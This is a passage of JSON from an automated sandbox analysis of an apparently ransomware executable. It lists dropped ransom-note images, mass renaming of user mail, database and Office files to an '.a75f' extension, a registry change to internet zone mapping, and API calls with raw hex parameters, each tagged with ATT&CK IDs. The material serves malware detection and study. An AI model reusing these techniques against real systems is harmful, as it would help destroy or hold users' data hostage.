00000000-00003064]\n \"_HELP_HELP_HELP_286I_.png\" has type \"PNG image data 1280 x 1024 8-bit/color RGBA non-interlaced\"- Location: [%USERPROFILE%\\Documents\\Outlook Files\\_HELP_HELP_HELP_286I_.png]- [targetUID: 00000000-00003064]\n \"_HELP_HELP_HELP_IPRMBH_.png\" has type \"PNG image data 1280 x 1024 8-bit/color RGBA non-interlaced\"- Location: [%USERPROFILE%\\Documents\\_HELP_HELP_HELP_IPRMBH_.png]- [targetUID: 00000000-00003064]\n \"_HELP_HELP_HELP_VNX7B_.png\" has type \"PNG image data 1280 x 1024 8-bit/color RGBA non-interlaced\"- Location: [C:\\TorService\\tor\\pluggable_transports\\_HELP_HELP_HELP_VNX7B_.png]- [targetUID: 00000000-00003064]\n \"_HELP_HELP_HELP_CJ4QR38_.png\" has type \"PNG image data 1280 x 1024 8-bit/color RGBA non-interlaced\"- Location: [%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\_HELP_HELP_HELP_CJ4QR38_.png]- [targetUID: 00000000-00003064]\n \"_HELP_HELP_HELP_SJITSQ0_.png\" has type \"PNG image data 1280 x 1024 8-bit/color RGBA non-interlaced\"- Location: [%USERPROFILE%\\Documents\\Amazon Downloader Logs\\_HELP_HELP_HELP_SJITSQ0_.png]- [targetUID: 00000000-00003064]\n \"77EC63BDA74BD0D0E0426DC8F8008506\" has type \"Microsoft Cabinet archive data Windows 2000/XP setup 71954 bytes 1 file at 0x2c +A \"authroot.stl\" number 1 6 datablocks 0x1 compression\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-39", "type": 8, "relevance": 1, "name": "Drops XML files", "description": "\"winword.exe_Rules.xml\" has type \"data\" - Location: [%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml]\n \"officeclicktorun.exe_Rules.xml\" has type \"data\" - Location: [%WINDIR%\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml]\n \"officeclicktorun.exe_Rules.xml\" has type \"data\" - Location: [%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml]\n \"officec2rclient.exe_Rules.xml\" has type \"data\" - Location: [%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml]\n \"setup32.exe_Rules.xml\" has type \"data\" - Location: [%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\setup32.exe_Rules.xml]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-53", "type": 8, "relevance": 1, "name": "Drops temp files", "description": "\"Tar450D.tmp\" has type \"data\"\n \"Cab450C.tmp\" has type \"Microsoft Cabinet archive data Windows 2000/XP setup 71954 bytes 1 file at 0x2c +A \"authroot.stl\" number 1 6 datablocks 0x1 compression\"\n \"4f98.tmp\" has type \"ASCII text with very long lines (344) with no line terminators\" - Location: [%TEMP%\\733c94c5\\4f98.tmp]\n \"cebb.tmp\" has type \"b.out overlay pure segmented standalone object file V2.3 V3.0 Large Text\" - Location: [%TEMP%\\733c94c5\\cebb.tmp]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" renamed original file\"C:\\TorService\\tor\\pluggable_transports\\pt_config.json\" to \"c:\\torservice\\tor\\pluggable_transports\\CIoIPImXCg.a75f\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" renamed original file\"C:\\TorService\\tor\\pluggable_transports\\README.SNOWFLAKE.md\" to \"c:\\torservice\\tor\\pluggable_transports\\hHJafMOJJs.a75f\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" renamed original file\"C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml\" to \"%WINDIR%\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\office\\16.0\\-XugY7CUjr.a75f\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml\" to \"%LOCALAPPDATA%\\microsoft\\office\\16.0\\zTAq5UtP2k.a75f\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml\" to \"%LOCALAPPDATA%\\microsoft\\office\\16.0\\VF15aXCH9s.a75f\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Office\\16.0\\setup32.exe_Rules.xml\" to \"%LOCALAPPDATA%\\microsoft\\office\\16.0\\To7nqe2Ov5.a75f\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs\" to \"%APPDATA%\\microsoft\\outlook\\n5g6LG0fEx.a75f\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml\" to \"%LOCALAPPDATA%\\microsoft\\office\\16.0\\CxMvkDCePO.a75f\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" renamed original file\"C:\\Users\\%OSUSER%\\Documents\\Amazon Downloader Logs\\Amazon_Downloader_Log_20171206-225712_1810e9e0-1a8d-457c-be3a-737de50dc6bb.txt\" to \"%USERPROFILE%\\documents\\amazon downloader logs\\g7ns4YlH-y.a75f\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" renamed original file\"C:\\Users\\%OSUSER%\\Documents\\Database1.accdb\" to \"%USERPROFILE%\\documents\\OleC2RcnvO.a75f\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" renamed original file\"C:\\Users\\%OSUSER%\\Documents\\Outlook Files\\Outlook.pst\" to \"%USERPROFILE%\\documents\\outlook files\\LhEvuNQOrS.a75f\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadResource with parameter {'hModule': '1994391552', 'hResInfo': '25318872'}\" (UID: 00000000-00003064)\n \"mshta.exe\" called \"LoadResource with parameter {'hModule': '1759313920', 'hResInfo': '47492528'}\" (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadResource with parameter {'hModule': '1700397056', 'hResInfo': '1701437816'}\" (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadResource with parameter {'hModule': '1700397056', 'hResInfo': '1701437800'}\" (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadResource with parameter {'hModule': '1786576896', 'hResInfo': '1787451048'}\" (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadResource with parameter {'hModule': '58589185', 'hResInfo': '58589840'}\" (UID: 00000000-00003044)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"taskkill.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6EDA0000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"mshta.exe\" called \"FindResourceW\" with parameter \"1\" - (UID: 00000000-00003044)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb2a76083827000040fd7f9a5cab7700f0fd7fd0b712004440fd7f00000000400000003f000000260000000040fd7fc4b71200c15cab776082b277260000000040fd7f9a5cab7700f0fd7fe8b712005789aa778083b2771317c275d8eb2a76 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007f00f00700000000008c474474f8692c008c47447400000000f8692c001cf61200086daa771881b277000000002cf9120000000000870b01635cf6120095e1a677c9e95c00feffffff6b2cab773119c27502100000000000000000010030f61200c89faa778c4744740000000000000000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000e55fff6288e31200459d777600003c00000000008000000002000000000013000011b46c9ce31200a235b46c800000008735b46c5886b46cb8e312009836b46c5886b46c00000000e8e41200000000000100000000000000010000000000b46c010000000000000000000000d8e31200 (UID: 00000000-00003064)\n \"mshta.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100771a000000b596dc770000000078cd4900f06c4300106e4300e8c8c806b871430095e1a67724de2a00feffffff5cdf2a0095e1a6773d545c00feffffffff2baa779a2aaa7780df2a0088e02a00a8df2a00340000c0f4de2a00e738aa77ec38aa77d996dc77340000c0a8df2a0088e02a00 (UID: 00000000-00003044)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003064)\n \"mshta.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003044)\n \"mshta.exe\" called \"GetLocaleInfoW\" with parameter \"1024\" - (UID: 00000000-00003044)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"OpenMutexW\" with parameter \"Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_Voices_Tokens_MS-Anna-1033-20-DSK_Mutex\" - (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"OpenMutexW\" with parameter \"Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_Voices_Tokens_MS-Anna-1033-20-DSK_Lex_Mutex\" - (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"OpenMutexW\" with parameter \"Local\\HKEY_CURRENT_USER_SOFTWARE_Microsoft_Speech_CurrentUserLexicon_Mutex\" - (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"OpenMutexW\" with parameter \"Local\\30F1B4D6-EEDA-11d2-9C23-00C04F8EF87C\" - (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"OpenMutexW\" with parameter \"Local\\{2F2B4A04-96B6-4F6A-974E-A71A37220067}-Mutex\" - (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"OpenMutexW\" with parameter \"Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_Chinese_Mutex\" - (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"OpenMutexW\" with parameter \"Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_English_Mutex\" - (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"OpenMutexW\" with parameter \"Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_French_Mutex\" - (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"OpenMutexW\" with parameter \"Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_German_Mutex\" - (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"OpenMutexW\" with parameter \"Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_Japanese_Mutex\" - (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"OpenMutexW\" with parameter \"Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_Spanish_Mutex\" - (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"OpenMutexW\" with parameter \"Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_TraditionalChinese_Mutex\" - (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"OpenMutexW\" with parameter \"Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_PhoneConverters_Tokens_Universal_Mutex\" - (UID: 00000000-00003064)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-169", "type": 6, "relevance": 1, "name": "Tries to access recent files", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\All Control Panel Items.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Appearance and Personalization.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Database1.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\desktop.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Display.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Downloads.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Hardware and Sound.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Network and Internet.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Programs.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\pythonLibrary.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\slowfuzzer.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\System and Security.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VxFuzzer.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Win7-KB3191566-x86.lnk\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Win7-KB3191566-x86.msu.lnk\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00003064)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000174f5120070f91200b2f4aa77990ce47700000000785924000000116d1200140074f41200e0000000e000116d1100000028123c0000003c0048143c0095e1a67799e05c00feffffff000000003300000084f512001100000000003c0028123c0084f51200145caa77435caa778d0de477020000000c023c0000003c0050013c00000200000000000050013c0028f71200a401ac77e0f412003300000000f8aa7750013c008410116d00283c0000000000440000003ff00000110000000000000000000000e81e22001cf512000000000044000044c4003c00fd0000fd65746543 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600a98f119964cc12006d823376ac30270004010000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000640063003400650062006200310038003600350063003900320062006500380036003400340035003200370032003300660064003900370038003200650036006400620039003800640037006600380039003400660037006200660065003100380039002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2baa77194fe477d8eb2a76ac0122000000220000000000000000001000ac00c9015200000000000000000000000000000000001100a700c901520000000000000000001870220000000000200000000000000000000000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000029006cb71200b344ce6b050000000000000000000000000000000000000000000000000000000802000000000000000000000000000084be12005845069928bc120028bc12005ecbe8760802000000000000005de67684be12000e5de6761cba1200dcaaea76010000000000000072000000ffffffffffffffffa4b71200780200000000000025000000a4b712007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360031f41199fcb712006d82337654e9290004010000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff2d00020086004200620be876000000001870220000000000500000009ceb290002000000700f26000000000001000008503b290040742200380be87630b6120002000000e4b612003f08f77502000000700f2600000000000100001888fbf675d4b61200c81cea76aab8120095fbf67508b81200700f260000000000000000000000000090b71200000022007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600ddf4119950b712006d82337654e9290004010000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600a5f3119968b012006d82337674fe290004010000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000029000ca21200b344ce6b090000000000000000000000000000000000000000000000000000000802000000000000000000000000000024a91200f8530699c8a61200c8a612005ecbe8760802000000000000005de67624a912000e5de676bca41200dcaaea7601000000000000007a000000ffffffffffffffff44a2120078020000000000002500000044a212007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360091e111999ca212006d8233766c0d2a0004010000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000022000020000050a2270004a212000464aa7738012200e063aa770d5ae477000000000000220058a22700000000008228aa77340000c030a11200c012000000002200580d2a00f83b0000ff07000000002200000000007f070000c4002200e82f2200512a0000b0a1120067e5a77700002200580d2a000000000000002200000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036003de21199f0a112006d82337664a2270004010000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360005d91199089b12006d8233766c0d2a0004010000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000024005c971200b344ce6b0900000000000000000000000000000000000000000000000000000008020000000000000000000000000000749e120048650699189c1200189c12005ecbe8760802000000000000005de676749e12000e5de6760c9a1200dcaaea7601000000000000007a000000ffffffffffffffff94971200780200000000000025000000949712007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360021d41199ec9712006d823376940f2a0004010000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002a00003b0000000022000000000020142a00509712000464aa7738012200e063aa77596fe477000000000000220028142a000000220000000001d0951200000000006cc9120095e1a67721ea5c00feffffff435caa7700002200500122001002000022142a0020142a0034981200c4971200880f2a000100010100961200809712000300000095e1a677000022007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cdd41199409712006d823376940f2a0004010000 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600d5d31199589012006d82337634142a0004010000 (UID: 00000000-00003064)\n 